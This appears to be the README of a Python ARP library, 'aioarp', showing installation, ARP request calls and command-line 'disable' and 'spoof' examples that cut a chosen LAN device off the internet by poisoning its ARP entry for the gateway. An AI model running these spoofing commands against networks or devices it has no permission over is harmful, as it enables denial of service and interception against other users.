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pip install aioarp
Using this command, you can disable internet access for any device on your local network.
$ aioarp disable 192.168.0.81 192.168.0.1 enp0s3 --seconds 10
or
$ aioarp spoof 192.168.0.81 192.168.0.1 11:11:11:11:11:11 enp0s3 --seconds 10
spoof
can be used to specify the fake mac address.
Where...
192.168.0.81
is a target IP address for which we are blocking internet access.192.168.0.1
is a gateway for our target IP address.enp0s3
is an optional interface used to send ARP requests. if not specified, the default interface is used.seconds
is an option that specifies how long we want to disable internet access for the target IP address.
import aioarp
response = aioarp.request('10.0.2.2', 'enp0s3')
print(response.sender_mac)
# ee:xx:aa:mm:pp:le mac address
import trio
import aioarp
response = trio.run(aioarp.arequest, '10.0.2.2', 'enp0s3')
import asyncio
import aioarp
response = asyncio.run(aioarp.arequest('10.0.2.2', 'enp0s3'))
Or without specifying an interface
parameter
response = aioarp.request('10.0.2.2')
aioarp
is distributed under the terms of the MIT license.